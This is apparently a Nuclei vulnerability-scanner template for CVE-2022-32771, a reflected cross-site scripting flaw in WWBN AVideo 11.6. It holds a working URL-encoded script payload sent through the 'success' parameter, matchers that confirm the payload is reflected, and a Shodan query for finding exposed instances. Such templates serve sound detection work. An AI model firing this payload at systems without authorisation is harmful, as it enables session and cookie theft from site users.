55 lines
2.0 KiB
YAML
55 lines
2.0 KiB
YAML
id: CVE-2022-32771
|
|
|
|
info:
|
|
name: WWBN AVideo 11.6 - Cross-Site Scripting
|
|
author: arafatansari
|
|
severity: medium
|
|
description: |
|
|
WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'success' parameter, which is inserted into the document with insufficient sanitization.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
|
|
remediation: |
|
|
Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
|
|
- https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-32771
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-32771
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00056
|
|
epss-percentile: 0.2114
|
|
cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: wwbn
|
|
product: avideo
|
|
shodan-query: http.html:"AVideo"
|
|
tags: cve,cve2022,avideo,xss,wwbn
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'avideoAlertSuccess("</script><script>alert(document.cookie);</script>'
|
|
- 'text: "</script><script>alert(document.cookie);</script>'
|
|
condition: or
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100db679dbca1055e5b8ec7dd2720020033ee63c5515617a1ca11c4084c393b0472022005e8d1d9c1effdb0209c9e792c632d652d705ad0ccea3a35f254f060d51f7e8e:922c64590222798bb761d5b6d8e72950 |